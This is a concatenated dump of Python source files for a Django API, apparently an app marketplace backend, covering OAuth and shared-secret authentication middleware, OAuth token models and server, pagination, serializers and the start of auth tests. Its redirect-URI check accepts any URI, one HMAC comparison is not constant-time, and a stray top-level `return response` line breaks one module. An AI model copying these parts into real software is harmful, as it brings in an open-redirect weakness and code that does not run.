            # This is 3-legged OAuth.
            log.info('Trying 3 legged OAuth')
            try:
                valid, oauth_request = oauth.verify_request(
                    request.build_absolute_uri(),
                    method, headers=auth_header,
                    require_resource_owner=True)
            except ValueError:
                log.error('ValueError on verifying_request', exc_info=True)
                return
            if not valid:
                log.error(u'Cannot find APIAccess token with that key: %s'
                          % oauth.attempted_key)
                return
            # Resolve the access token back to the user who owns it.
            uid = Token.objects.filter(
                token_type=ACCESS_TOKEN,
                key=oauth_request.resource_owner_key).values_list(
                    'user_id', flat=True)[0]
            request.amo_user = UserProfile.objects.select_related(
                'user').get(pk=uid)
            request.user = request.amo_user
        else:
            # This is 2-legged OAuth.
            log.info('Trying 2 legged OAuth')
            try:
                valid, oauth_request = oauth.verify_request(
                    request.build_absolute_uri(),
                    method, headers=auth_header,
                    require_resource_owner=False)
            except ValueError:
                log.error('ValueError on verifying_request', exc_info=True)
                return
            if not valid:
                log.error(u'Cannot find APIAccess token with that key: %s'
                          % oauth.attempted_key)
                return
            # 2-legged requests act as the user who owns the consumer key.
            uid = Access.objects.filter(
                key=oauth_request.client_key).values_list(
                    'user_id', flat=True)[0]
            request.amo_user = UserProfile.objects.select_related(
                'user').get(pk=uid)
            request.user = request.amo_user
        # But you cannot have one of these roles.
        denied_groups = set(['Admins'])
        roles = set(request.amo_user.groups.values_list('name', flat=True))
        if roles and roles.intersection(denied_groups):
            log.info(u'Attempt to use API with denied role, user: %s'
                     % request.amo_user.pk)
            # Set request attributes back to None.
            request.user = request.amo_user = None
            return
        if request.user:
            request.authed_from.append('RestOAuth')
        log.info('Successful OAuth with user: %s' % request.user)
class RestSharedSecretMiddleware(object):
    """
    Authenticates API requests using the 'mkt-shared-secret' scheme: an
    Authorization header (or `_user` query parameter) of the form
    "<email>,<hmac>,<unique_id>". On success it sets request.amo_user /
    request.user and appends 'RestSharedSecret' to request.authed_from.
    """
    def process_request(self, request):
        # For now we only want these to apply to the API.
        # This attribute is set in RedirectPrefixedURIMiddleware.
        if not getattr(request, 'API', False):
            return
        # Set up authed_from attribute.
        if not hasattr(request, 'authed_from'):
            request.authed_from = []
        header = request.META.get('HTTP_AUTHORIZATION', '').split(None, 1)
        if header and header[0].lower() == 'mkt-shared-secret':
            auth = header[1]
        else:
            # Fall back to the `_user` query parameter.
            auth = request.GET.get('_user')
        if not auth:
            log.info('API request made without shared-secret auth token')
            return
        try:
            email, hm, unique_id = str(auth).split(',')
            consumer_id = hashlib.sha1(
                email + settings.SECRET_KEY).hexdigest()
            # NOTE(review): '==' is not a constant-time comparison;
            # hmac.compare_digest would be safer here — confirm Python
            # version support before changing.
            matches = hmac.new(unique_id + settings.SECRET_KEY,
                               consumer_id, hashlib.sha512).hexdigest() == hm
            if matches:
                try:
                    request.amo_user = UserProfile.objects.get(email=email)
                    request.user = request.amo_user
                    request.authed_from.append('RestSharedSecret')
                except UserProfile.DoesNotExist:
                    log.info('Auth token matches absent user (%s)' % email)
                    return
            else:
                log.info('Shared-secret auth token does not match')
                return
            log.info('Successful SharedSecret with user: %s' % request.user.pk)
            return
        except Exception, e:
            # Malformed token (wrong number of parts, bad types, ...).
            log.info('Bad shared-secret auth data: %s (%s)', auth, e)
            return
class APITransactionMiddleware(TransactionMiddleware):
    """Transaction middleware that only takes effect for API requests."""

    def process_request(self, request):
        if not getattr(request, 'API', False):
            return None
        return super(APITransactionMiddleware, self).process_request(request)

    def process_exception(self, request, exception):
        if not getattr(request, 'API', False):
            return None
        return super(APITransactionMiddleware, self).process_exception(
            request, exception)

    def process_response(self, request, response):
        if getattr(request, 'API', False):
            return super(APITransactionMiddleware, self).process_response(
                request, response)
        return response
# How long (in seconds) a user stays pinned to the master database after a
# write; used as the cache TTL by APIPinningMiddleware.
PINNING_SECONDS = int(getattr(settings, 'MULTIDB_PINNING_SECONDS', 15))
class APIPinningMiddleware(PinningRouterMiddleware):
    """
    Similar to multidb's pinning, but without relying on cookies: users
    who must read from the master (non-anonymous users who are making a
    write request, or did so recently) are tracked in the cache with a
    timeout. Outside the API this falls back to cookie-based pinning.

    Note: authentication happens late in the API, so process_request()
    is also invoked manually from authentication classes once a user is
    successfully authenticated.
    """

    def cache_key(self, request):
        """Cache key identifying the current user for pinning purposes."""
        return u'api-pinning:%s' % request.user.id

    def process_request(self, request):
        if not getattr(request, 'API', False):
            return super(APIPinningMiddleware, self).process_request(request)
        user = request.user
        if user and not user.is_anonymous():
            # A recent write (cache hit) or a write happening now pins us.
            if (cache.get(self.cache_key(request)) or
                    request.method in ('DELETE', 'PATCH', 'POST', 'PUT')):
                statsd.incr('api.db.pinned')
                pin_this_thread()
                return
        statsd.incr('api.db.unpinned')
        unpin_this_thread()

    def process_response(self, request, response):
        if not getattr(request, 'API', False):
            return (super(APIPinningMiddleware, self)
                    .process_response(request, response))
        response['API-Pinned'] = str(this_thread_is_pinned())
        user = request.user
        wrote = (request.method in ('DELETE', 'PATCH', 'POST', 'PUT') or
                 getattr(response, '_db_write', False))
        if user and not user.is_anonymous() and wrote:
            # Remember the write so subsequent reads stay on the master.
            cache.set(self.cache_key(request), 1, PINNING_SECONDS)
        return response
return response
class CORSMiddleware(object):
    """
    Adds CORS headers to responses.

    Mostly for use by tastypie, which has no clean hook for deciding
    whether a response should carry CORS headers, because it often
    errors out with immediate HTTP responses.
    """
    def process_response(self, request, response):
        fireplace_url = settings.FIREPLACE_URL
        from_fireplace = request.META.get('HTTP_ORIGIN') == fireplace_url
        response['Access-Control-Allow-Headers'] = (
            'X-HTTP-Method-Override, Content-Type')
        if from_fireplace or getattr(request, 'CORS', None):
            if from_fireplace:
                # Requests from our hosted frontend may send cookies.
                response['Access-Control-Allow-Origin'] = fireplace_url
                response['Access-Control-Allow-Credentials'] = 'true'
            else:
                response['Access-Control-Allow-Origin'] = '*'
            methods = [verb.upper() for verb in request.CORS]
            if 'OPTIONS' not in methods:
                methods.append('OPTIONS')
            response['Access-Control-Allow-Methods'] = ', '.join(methods)
        # The headers that the response will be able to access.
        response['Access-Control-Expose-Headers'] = (
            'API-Filter, API-Status, API-Version')
        return response
# Matches /api/v<N>/... capturing the version; a plain /api/ prefix has no
# explicit version and falls back to 1.
v_re = re.compile(r'^/api/v(?P<version>\d+)/|^/api/')


def detect_api_version(request):
    """Return the API version for `request`'s path, always as an int.

    Previously this returned a *string* for explicitly-versioned paths,
    and in Python 2 `'1' < 2` is False, which silently broke the
    deprecation comparison downstream. Callers already int()'d or
    formatted the value, so returning int is backward-compatible.

    Assumes the path matches the /api/ prefix (only called for API
    requests); a non-matching path raises AttributeError, as before.
    """
    url = request.META.get('PATH_INFO', '')
    version = v_re.match(url).group('version')
    return int(version) if version else 1
class APIVersionMiddleware(object):
    """
    Figures out what version of the API the request targets, exposes it
    as `request.API_VERSION` (int), and adds an API-Version response
    header plus a deprecation notice when applicable.
    """
    def process_request(self, request):
        if getattr(request, 'API', False):
            version = detect_api_version(request)
            request.API_VERSION = int(version)

    def process_response(self, request, response):
        if not getattr(request, 'API', False):
            return response
        version = getattr(request, 'API_VERSION', None)
        if version is None:
            version = detect_api_version(request)
        # Bug fix: coerce to int before comparing. detect_api_version()
        # could return a string, and in Python 2 a str always compares
        # greater than an int ('1' < 2 is False), so old API versions
        # were never flagged as deprecated.
        version = int(version)
        response['API-Version'] = version
        if version < settings.API_CURRENT_VERSION:
            response['API-Status'] = 'Deprecated'
        return response
class APIFilterMiddleware(object):
    """
    Adds an API-Filter header to successful API responses: a urlencoded
    summary of the filters (carrier, device, lang, pro, region) applied
    to the request, and varies the cache on that header.
    """
    def process_response(self, request, response):
        if not getattr(request, 'API', False) or response.status_code >= 500:
            return response
        devices = [name.lower() for name in ('GAIA', 'MOBILE', 'TABLET')
                   if getattr(request, name, False)]
        filters = (
            ('carrier', get_carrier() or ''),
            ('device', devices),
            ('lang', request.LANG),
            ('pro', request.GET.get('pro', '')),
            ('region', request.REGION.slug),
        )
        response['API-Filter'] = urlencode(filters, doseq=True)
        patch_vary_headers(response, ['API-Filter'])
        return response
class TimingMiddleware(GraphiteRequestTimingMiddleware):
    """
    django_statsd timing middleware wrapper that records API requests
    under an 'api.*' statsd prefix instead of the usual 'view.*'.
    """
    def process_view(self, request, *args):
        if getattr(request, 'API', False):
            TastyPieRequestTimingMiddleware().process_view(request, *args)
        else:
            super(TimingMiddleware, self).process_view(request, *args)

    def _record_time(self, request):
        if not hasattr(request, '_start_time'):
            return
        prefix = 'api' if getattr(request, 'API', False) else 'view'
        elapsed_ms = int((time.time() - request._start_time) * 1000)
        data = {'method': request.method,
                'module': request._view_module,
                'name': request._view_name,
                'pre': prefix}
        # Record at three granularities, from most to least specific.
        statsd.timing('{pre}.{module}.{name}.{method}'.format(**data),
                      elapsed_ms)
        statsd.timing('{pre}.{module}.{method}'.format(**data), elapsed_ms)
        statsd.timing('{pre}.{method}'.format(**data), elapsed_ms)
class GZipMiddleware(BaseGZipMiddleware):
    """
    Wrapper around GZipMiddleware, which only enables gzip for API responses.
    It specifically avoids enabling it for non-API responses because that might
    leak security tokens through the BREACH attack.
    https://www.djangoproject.com/weblog/2013/aug/06/breach-and-django/
    http://breachattack.com/
    https://bugzilla.mozilla.org/show_bug.cgi?id=960752
    """
    def process_response(self, request, response):
        # request.API is set by earlier middleware; anything else is
        # returned uncompressed.
        if not getattr(request, 'API', False):
            return response
        return super(GZipMiddleware, self).process_response(request, response)
########NEW FILE########
__FILENAME__ = models
import os
import time
from django.db import models
from aesfield.field import AESField
from amo.models import ModelBase
from users.models import UserProfile
# OAuth 1.0 token types: a request token is exchanged for an access token
# once the user authorizes it.
REQUEST_TOKEN = 0
ACCESS_TOKEN = 1
TOKEN_TYPES = ((REQUEST_TOKEN, u'Request'), (ACCESS_TOKEN, u'Access'))
class Access(ModelBase):
    """OAuth consumer credentials issued to an API client."""
    key = models.CharField(max_length=255, unique=True)
    # Encrypted at rest via django-aesfield.
    secret = AESField(max_length=255, aes_key='api:access:secret')
    user = models.ForeignKey(UserProfile)
    redirect_uri = models.CharField(max_length=255)
    app_name = models.CharField(max_length=255)

    class Meta:
        db_table = 'api_access'
class Token(ModelBase):
    """An OAuth request or access token tied to a consumer (Access)."""
    token_type = models.SmallIntegerField(choices=TOKEN_TYPES)
    creds = models.ForeignKey(Access)
    key = models.CharField(max_length=255)
    secret = models.CharField(max_length=255)
    timestamp = models.IntegerField()
    user = models.ForeignKey(UserProfile, null=True)
    # Only request tokens carry a verifier (OAuth 1.0a flow).
    verifier = models.CharField(max_length=255, null=True)

    class Meta:
        db_table = 'oauth_token'

    @classmethod
    def generate_new(cls, token_type, creds, user=None):
        """Create and save a token with fresh random key/secret, plus a
        verifier when it is a request token."""
        return cls.objects.create(
            token_type=token_type,
            creds=creds,
            key=generate(),
            secret=generate(),
            timestamp=time.time(),
            verifier=generate() if token_type == REQUEST_TOKEN else None,
            user=user)
class Nonce(ModelBase):
    """Seen OAuth nonces, used to reject replayed requests."""
    nonce = models.CharField(max_length=128)
    timestamp = models.IntegerField()
    client_key = models.CharField(max_length=255)
    request_token = models.CharField(max_length=128, null=True)
    access_token = models.CharField(max_length=128, null=True)

    class Meta:
        db_table = 'oauth_nonce'
        # A nonce may only be used once per (timestamp, client, token).
        unique_together = ('nonce', 'timestamp', 'client_key',
                           'request_token', 'access_token')
def generate():
    """Return a 128-character hex string built from 64 random bytes."""
    random_bytes = os.urandom(64)
    return random_bytes.encode('hex')  # Python 2 hex codec
########NEW FILE########
__FILENAME__ = oauth
import string
from urllib import urlencode
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
import commonware.log
from oauthlib import oauth1
from oauthlib.common import safe_string_equals
from amo.decorators import login_required
from amo.utils import urlparams
from mkt.api.models import Access, Nonce, Token, REQUEST_TOKEN, ACCESS_TOKEN
# Placeholder credentials returned by OAuthServer on lookup failure so that
# success and failure code paths take similar time (timing-attack defence).
DUMMY_CLIENT_KEY = u'DummyOAuthClientKeyString'
DUMMY_TOKEN = u'DummyOAuthToken'
DUMMY_SECRET = u'DummyOAuthSecret'
log = commonware.log.getLogger('z.api')
class OAuthServer(oauth1.Server):
    """
    oauthlib OAuth 1.0 server backed by the Access/Token/Nonce models.

    Several lookups deliberately return dummy values on failure so that
    success and failure take a similar amount of time (timing-attack
    defence) — see the per-method comments.
    """
    safe_characters = set(string.printable)
    # (min, max) length bounds enforced by oauthlib.
    nonce_length = (7, 128)
    access_token_length = (8, 128)
    request_token_length = (8, 128)
    verifier_length = (8, 128)
    client_key_length = (8, 128)
    enforce_ssl = False  # SSL enforcement is handled by ops. :-)

    def validate_client_key(self, key):
        # Remember the key so middleware can log failed attempts.
        self.attempted_key = key
        return Access.objects.filter(key=key).exists()

    def get_client_secret(self, key):
        # This method returns a dummy secret on failure so that auth
        # success and failure take a codepath with the same run time,
        # to prevent timing attacks.
        try:
            # OAuthlib needs unicode objects, django-aesfield returns a string.
            return Access.objects.get(key=key).secret.decode('utf8')
        except Access.DoesNotExist:
            return DUMMY_SECRET

    @property
    def dummy_client(self):
        return DUMMY_CLIENT_KEY

    @property
    def dummy_request_token(self):
        return DUMMY_TOKEN

    @property
    def dummy_access_token(self):
        return DUMMY_TOKEN

    def validate_timestamp_and_nonce(self, client_key, timestamp, nonce,
                                     request_token=None, access_token=None):
        # The Nonce table's unique_together makes `created` False when the
        # same nonce combination was already seen (replay).
        n, created = Nonce.objects.safer_get_or_create(
            defaults={'client_key': client_key},
            nonce=nonce, timestamp=timestamp,
            request_token=request_token,
            access_token=access_token)
        return created

    def validate_requested_realm(self, client_key, realm):
        # Realms are not used; accept everything.
        return True

    def validate_realm(self, client_key, access_token, uri=None,
                       required_realm=None):
        return True

    def validate_redirect_uri(self, client_key, redirect_uri):
        # Accept any redirect URI.
        return True

    def validate_request_token(self, client_key, request_token):
        # This method must take the same amount of time/db lookups for
        # success and failure to prevent timing attacks.
        return Token.objects.filter(token_type=REQUEST_TOKEN,
                                    creds__key=client_key,
                                    key=request_token).exists()

    def validate_access_token(self, client_key, access_token):
        # This method must take the same amount of time/db lookups for
        # success and failure to prevent timing attacks.
        return Token.objects.filter(token_type=ACCESS_TOKEN,
                                    creds__key=client_key,
                                    key=access_token).exists()

    def validate_verifier(self, client_key, request_token, verifier):
        # This method must take the same amount of time/db lookups for
        # success and failure to prevent timing attacks.
        try:
            t = Token.objects.get(key=request_token, token_type=REQUEST_TOKEN)
            candidate = t.verifier
        except Token.DoesNotExist:
            candidate = ''
        return safe_string_equals(candidate, verifier)

    def get_request_token_secret(self, client_key, request_token):
        # This method must take the same amount of time/db lookups for
        # success and failure to prevent timing attacks.
        try:
            t = Token.objects.get(key=request_token, creds__key=client_key,
                                  token_type=REQUEST_TOKEN)
            return t.secret
        except Token.DoesNotExist:
            return DUMMY_SECRET

    def get_access_token_secret(self, client_key, request_token):
        # This method must take the same amount of time/db lookups for
        # success and failure to prevent timing attacks.
        try:
            t = Token.objects.get(key=request_token, creds__key=client_key,
                                  token_type=ACCESS_TOKEN)
        except Token.DoesNotExist:
            return DUMMY_SECRET
        return t.secret
@csrf_exempt
def access_request(request):
    """
    OAuth access-token endpoint: verifies the request, exchanges an
    authorized request token for a new access token (deleting the
    request token), and returns the credentials urlencoded. Responds
    401 on any verification failure.
    """
    oa = OAuthServer()
    try:
        valid, oauth_request = oa.verify_access_token_request(
            request.build_absolute_uri(),
            request.method,
            request.body,
            {'Authorization': request.META.get('HTTP_AUTHORIZATION'),
             'Content-Type': request.META.get('CONTENT_TYPE')
             })
    except ValueError:
        valid = False
    if valid:
        req_t = Token.objects.get(
            token_type=REQUEST_TOKEN,
            key=oauth_request.resource_owner_key)
        t = Token.generate_new(
            token_type=ACCESS_TOKEN,
            creds=req_t.creds,
            user=req_t.user)
        # Clean up as we go.
        req_t.delete()
        return HttpResponse(
            urlencode({'oauth_token': t.key,
                       'oauth_token_secret': t.secret}),
            content_type='application/x-www-form-urlencoded')
    else:
        log.error('Invalid OAuth request for acquiring access token')
        return HttpResponse(status=401)
@csrf_exempt
def token_request(request):
    """
    OAuth request-token endpoint: verifies the signed request and issues
    a new request token for the consumer, returned urlencoded. Responds
    401 on any verification failure.
    """
    oa = OAuthServer()
    try:
        valid, oauth_request = oa.verify_request_token_request(
            request.build_absolute_uri(),
            request.method,
            request.body,
            {'Authorization': request.META.get('HTTP_AUTHORIZATION'),
             'Content-Type': request.META.get('CONTENT_TYPE')
             })
    except ValueError:
        valid = False
    if valid:
        consumer = Access.objects.get(key=oauth_request.client_key)
        t = Token.generate_new(token_type=REQUEST_TOKEN, creds=consumer)
        return HttpResponse(
            urlencode({'oauth_token': t.key,
                       'oauth_token_secret': t.secret,
                       'oauth_callback_confirmed': True}),
            content_type='application/x-www-form-urlencoded')
    else:
        log.error('Invalid OAuth request for acquiring request token')
        return HttpResponse(status=401)
@csrf_exempt
@login_required
def authorize(request):
    """
    OAuth user-authorization endpoint.

    GET renders the grant/deny page for the request token named in
    `oauth_token`. POST records the decision: on 'grant' the logged-in
    user is attached to the token and the client is redirected to its
    redirect_uri with the verifier; on 'deny' the token is deleted.
    Unknown tokens or malformed requests get a 401.
    """
    if request.method == 'GET' and 'oauth_token' in request.GET:
        try:
            t = Token.objects.get(token_type=REQUEST_TOKEN,
                                  key=request.GET['oauth_token'])
        except Token.DoesNotExist:
            log.error('Invalid OAuth request for obtaining user authorization')
            return HttpResponse(status=401)
        return render(request, 'developers/oauth_authorize.html',
                      {'app_name': t.creds.app_name,
                       'oauth_token': request.GET['oauth_token']})
    elif request.method == 'POST':
        token = request.POST.get('oauth_token')
        try:
            t = Token.objects.get(token_type=REQUEST_TOKEN,
                                  key=token)
        except Token.DoesNotExist:
            return HttpResponse(status=401)
        if 'grant' in request.POST:
            # Bind the token to the authorizing user before redirecting.
            t.user = request.user
            t.save()
            return HttpResponseRedirect(
                urlparams(t.creds.redirect_uri, oauth_token=token,
                          oauth_verifier=t.verifier))
        elif 'deny' in request.POST:
            t.delete()
            return HttpResponse(status=200)
    else:
        log.error('Invalid OAuth request for user access authorization')
    return HttpResponse(status=401)
########NEW FILE########
__FILENAME__ = paginator
import urlparse
from django.core.paginator import EmptyPage, Page, PageNotAnInteger, Paginator
from django.http import QueryDict
from django.utils.http import urlencode
from rest_framework import pagination, serializers
class ESPaginator(Paginator):
    """
    Paginator tuned for ElasticSearch results.

    The stock Paginator runs a .count() query before slicing; ES
    responses already carry the total hit count, so we slice
    optimistically and read the count off the executed result instead.
    """
    def validate_number(self, number):
        """
        Validate a 1-based page number, ignoring the upper bound (the
        real total is only known after the ES query runs).
        """
        try:
            page_num = int(number)
        except (TypeError, ValueError):
            raise PageNotAnInteger('That page number is not an integer')
        if page_num < 1:
            raise EmptyPage('That page number is less than 1')
        return page_num

    def page(self, number):
        """
        Return a Page object, ignoring "orphans" and taking the total
        count from the ES result itself.
        """
        page_num = self.validate_number(number)
        start = (page_num - 1) * self.per_page
        page = Page(self.object_list[start:start + self.per_page],
                    page_num, self)
        # Force the search to evaluate, then read the count directly from
        # _results_cache so no extra query runs even for empty results.
        # FIXME: call page.object_list.count() directly once
        # https://github.com/mozilla/elasticutils/pull/212 is merged and
        # released.
        page.object_list.execute()
        self._count = page.object_list._results_cache.count
        return page
class MetaSerializer(serializers.Serializer):
    """
    Serializer for the 'meta' pagination dict. Stays backwards-compatible
    with tastypie-style pagination (offsets and limits) while the views
    themselves use a standard page-number Paginator.
    """
    next = serializers.SerializerMethodField('get_next')
    previous = serializers.SerializerMethodField('get_previous')
    total_count = serializers.SerializerMethodField('get_total_count')
    offset = serializers.SerializerMethodField('get_offset')
    limit = serializers.SerializerMethodField('get_limit')

    def replace_query_params(self, url, params):
        """Return `url` with its query string updated from `params`."""
        scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
        merged = QueryDict(query).dict()
        merged.update(params)
        return urlparse.urlunsplit(
            (scheme, netloc, path, urlencode(merged), fragment))

    def get_offset_link_for_page(self, page, number):
        """Build the current URL with offset/limit set for page `number`."""
        request = self.context.get('request')
        url = request.get_full_path() if request else ''
        per_page = page.paginator.per_page
        # Pages are 1-based, but offsets are 0-based.
        return self.replace_query_params(
            url, {'offset': (number - 1) * per_page, 'limit': per_page})

    def get_next(self, page):
        if page.has_next():
            return self.get_offset_link_for_page(page,
                                                 page.next_page_number())
        return None

    def get_previous(self, page):
        if page.has_previous():
            return self.get_offset_link_for_page(page,
                                                 page.previous_page_number())
        return None

    def get_total_count(self, page):
        return page.paginator.count

    def get_offset(self, page):
        # start_index() is 1-based; convert to a 0-based offset, leaving
        # 0 (empty page) untouched.
        index = page.start_index()
        return index - 1 if index > 0 else index

    def get_limit(self, page):
        return page.paginator.per_page
class CustomPaginationSerializer(pagination.BasePaginationSerializer):
    # 'meta' receives the whole page object (source='*') so
    # MetaSerializer can derive next/previous/total_count/offset/limit.
    meta = MetaSerializer(source='*')  # Takes the page object as the source
    results_field = 'objects'
########NEW FILE########
__FILENAME__ = patch
from django.core.urlresolvers import reverse
from django.utils.functional import lazy
from rest_framework import relations, reverse as rest_reverse
def _reverse(viewname, args=None, kwargs=None, request=None, format=None,
             **extra):
    """
    Same as the rest framework reverse, except does not get the base URL.

    `request` is accepted (and ignored) so the signature stays
    compatible with rest_framework's reverse.
    """
    if format is not None:
        kwargs = kwargs or {}
        kwargs['format'] = format
    return reverse(viewname, args=args, kwargs=kwargs, **extra)
# Marker attribute — presumably used elsewhere to detect that the
# monkeypatch has been applied.
_reverse.patched = 'patched'
# Monkeypatch this in.
def patch():
    """Replace DRF's reverse helpers with the relative _reverse above."""
    relations.reverse = _reverse
    rest_reverse.reverse = _reverse
    rest_reverse.reverse_lazy = lazy(_reverse, str)
########NEW FILE########
__FILENAME__ = renderers
import json
from django.http.multipartparser import parse_header
from rest_framework.negotiation import DefaultContentNegotiation
from rest_framework.renderers import JSONRenderer
class SuccinctJSONRenderer(JSONRenderer):
    """
    JSONRenderer subclass that strips spaces from the output by passing
    compact separators to json.dumps.
    """
    def render(self, data, accepted_media_type=None, renderer_context=None):
        renderer_context = renderer_context or {}
        indent = renderer_context.get('indent', None)
        # Pass to the superclass if the Accept header is set with an explicit
        # indent, if an indent level is manually passed, or if you're attempting
        # to render `None`.
        if accepted_media_type:
            base_media_type, params = parse_header(
                accepted_media_type.encode('ascii'))
            # NOTE(review): an indent taken from the Accept params is a
            # *string*, not an int, and is forwarded as-is — confirm the
            # superclass handles that.
            indent = params.get('indent', indent)
        if data is None or indent:
            return super(SuccinctJSONRenderer, self).render(data,
                                                            accepted_media_type,
                                                            renderer_context)
        return json.dumps(data, cls=self.encoder_class, indent=indent,
                          ensure_ascii=self.ensure_ascii, separators=(',', ':'))
class FirstAvailableRenderer(DefaultContentNegotiation):
    """
    Content Negotiation class that ignores the Accept header when there is only
    one renderer set on the view. Since most of our views only use the default
    renderer list, which contains only SuccinctJSONRenderer, this means we
    don't have to parse the Accept header for those.

    Override content_negotiation_class in your class if you need something
    different.
    """
    def select_renderer(self, request, renderers, format_suffix=None):
        if len(renderers) != 1:
            return super(FirstAvailableRenderer, self).select_renderer(
                request, renderers, format_suffix=format_suffix)
        only = renderers[0]
        return only, only.media_type
########NEW FILE########
__FILENAME__ = serializers
from django.conf import settings
import commonware.log
from rest_framework import serializers
from rest_framework.reverse import reverse
from tower import ugettext as _
log = commonware.log.getLogger('z.mkt.api.forms')
class PotatoCaptchaSerializer(serializers.Serializer):
    """
    Serializer class to inherit from to get PotatoCaptcha (tm) protection for
    an API based on DRF.

    Clients using this API are supposed to have 2 fields in their HTML, "tuber"
    and "sprout". They should never submit a value for "tuber", and they should
    always submit "potato" as the value for "sprout". This is to prevent dumb
    bots from spamming us.

    If a wrong value is entered for "sprout" or "tuber" is present, a
    ValidationError will be returned.

    Note: this is completely disabled for authenticated users.
    """
    # This field's value should always be blank (spammers are dumb).
    tuber = serializers.CharField(required=False)
    # This field's value should always be 'potato' (set by JS).
    sprout = serializers.CharField()

    def __init__(self, *args, **kwargs):
        # Requires 'request' in the serializer context; raises a
        # ValidationError at construction time when it is missing.
        super(PotatoCaptchaSerializer, self).__init__(*args, **kwargs)
        if hasattr(self, 'context') and 'request' in self.context:
            self.request = self.context['request']
        else:
            raise serializers.ValidationError('Need request in context')
        self.has_potato_recaptcha = True
        # Authenticated users are exempt: drop both honeypot fields.
        if self.request.user.is_authenticated():
            self.fields.pop('tuber')
            self.fields.pop('sprout')
            self.has_potato_recaptcha = False

    def validate(self, attrs):
        """Fail validation (and log the client IP) when the honeypot check
        trips; otherwise strip the captcha fields from the output."""
        attrs = super(PotatoCaptchaSerializer, self).validate(attrs)
        if self.has_potato_recaptcha:
            sprout = attrs.get('sprout', None)
            tuber = attrs.get('tuber', None)
            if tuber or sprout != 'potato':
                ip = self.request.META.get('REMOTE_ADDR', '')
                log.info(u'Spammer thwarted: %s' % ip)
                raise serializers.ValidationError(
                    _('Form could not be submitted.'))
            # Don't keep the internal captcha fields, we don't want them to
            # pollute self.data
            self.fields.pop('tuber')
            self.fields.pop('sprout')
        return attrs
class CarrierSerializer(serializers.Serializer):
    """Read-only representation of a carrier: name, slug and id."""
    name = serializers.CharField()
    slug = serializers.CharField()
    id = serializers.IntegerField()
class RegionSerializer(CarrierSerializer):
    """Carrier fields plus the region's default currency and language."""
    default_currency = serializers.CharField()
    default_language = serializers.CharField()
class URLSerializerMixin(serializers.ModelSerializer):
    """
    ModelSerializer mixin that adds a field named `url` to the object with that
    resource's URL. DRF will automatically populate the `Location` header from
    this field when appropriate.

    You may define that url in one of two ways:

    1) By defining a `url_basename` property on the Meta class. The URL will
       then be determined by reversing `<url_basename>-detail`, with the `pk`
       passed as a keyword argument.
    2) By overriding the get_url method.
    """
    url = serializers.SerializerMethodField('get_url')

    def get_url(self, obj):
        # Without a request in the context or a url_basename on the Meta
        # class there is nothing to reverse.
        if 'request' not in self.context:
            return None
        if not hasattr(self.Meta, 'url_basename'):
            return None
        request = self.context['request']
        # Non-current API versions get an explicit URL namespace prefix.
        prefix = ''
        if request.API_VERSION != settings.API_CURRENT_VERSION:
            prefix = 'api-v%d:' % request.API_VERSION
        view_name = '%s%s-detail' % (prefix, self.Meta.url_basename)
        return reverse(view_name, request=request, kwargs={'pk': obj.pk})
########NEW FILE########
__FILENAME__ = test_authentication
from datetime import datetime
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from mock import Mock, patch
from multidb.pinning import this_thread_is_pinned, unpin_this_thread
from nose.tools import eq_, ok_
from rest_framework.request import Request
from access.models import Group, GroupUser
from amo.helpers import absolutify
from amo.tests import TestCase
from test_utils import RequestFactory
from users.models import UserProfile
from mkt.api import authentication
from mkt.api.middleware import RestOAuthMiddleware, RestSharedSecretMiddleware
from mkt.api.models import Access, generate
from mkt.api.tests.test_oauth import OAuthClient
from mkt.site.fixtures import fixture
from mkt.site.middleware import RedirectPrefixedURIMiddleware
class TestRestOAuthAuthentication(TestCase):
    """Tests for RestOAuthAuthentication: valid credentials succeed, bad
    secrets and admin accounts are rejected, and auth must not pin the
    request's thread to the master database."""
    fixtures = fixture('user_2519', 'group_admin', 'group_editor')

    def setUp(self):
        self.api_name = 'foo'
        self.profile = UserProfile.objects.get(pk=2519)
        self.profile.update(read_dev_agreement=datetime.today())
        self.access = Access.objects.create(key='test_oauth_key',
                                            secret=generate(),
                                            user=self.profile)
        self.auth = authentication.RestOAuthAuthentication()
        self.middlewares = [RedirectPrefixedURIMiddleware, RestOAuthMiddleware]
        unpin_this_thread()

    def call(self, client=None):
        """Build a signed POST request and run it through the middlewares."""
        client = client or OAuthClient(self.access)
        # Make a fake POST somewhere. We use POST in order to properly test db
        # pinning after auth.
        url = absolutify('/api/whatever')
        req = RequestFactory().post(
            url,
            HTTP_HOST='testserver',
            HTTP_AUTHORIZATION=client.sign('POST', url)[1]['Authorization'])
        for m in self.middlewares:
            m().process_request(req)
        return req

    def add_group_user(self, user, *names):
        """Add `user` to each of the named groups."""
        for name in names:
            group = Group.objects.get(name=name)
            # Fixed: previously this ignored the `user` argument and always
            # added self.profile.
            GroupUser.objects.create(user=user, group=group)

    def test_accepted(self):
        req = Request(self.call())
        eq_(self.auth.authenticate(req), (self.profile, None))

    def test_request_token_fake(self):
        # A client presenting a wrong secret must not authenticate, and the
        # failed attempt must not pin the thread to the master db.
        c = Mock()
        c.key = self.access.key
        c.secret = 'mom'
        ok_(not self.auth.authenticate(
            Request(self.call(client=OAuthClient(c)))))
        ok_(not this_thread_is_pinned())

    def test_request_admin(self):
        # Admins may not authenticate over OAuth.
        self.add_group_user(self.profile, 'Admins')
        ok_(not self.auth.authenticate(Request(self.call())))

    def test_request_has_role(self):
        self.add_group_user(self.profile, 'App Reviewers')
        ok_(self.auth.authenticate(Request(self.call())))
class TestRestAnonymousAuthentication(TestCase):
    """RestAnonymousAuthentication must yield an AnonymousUser with no token
    and must not pin the thread to the master database."""

    def setUp(self):
        self.auth = authentication.RestAnonymousAuthentication()
        self.request = RequestFactory().post('/api/whatever')
        unpin_this_thread()

    def test_auth(self):
        user, token = self.auth.authenticate(self.request)
        ok_(isinstance(user, AnonymousUser))
        eq_(token, None)
        ok_(not this_thread_is_pinned())
@patch.object(settings, 'SECRET_KEY', 'gubbish')
class TestSharedSecretAuthentication(TestCase):
    """Tests for the mkt shared-secret scheme, via both the `_user` query
    parameter and the `mkt-shared-secret` Authorization header.

    SECRET_KEY is pinned to 'gubbish' because the hard-coded credential
    strings below were generated against that key.
    """
    fixtures = fixture('user_2519')

    def setUp(self):
        self.auth = authentication.RestSharedSecretAuthentication()
        self.profile = UserProfile.objects.get(pk=2519)
        self.profile.update(email=self.profile.email)
        self.middlewares = [RedirectPrefixedURIMiddleware,
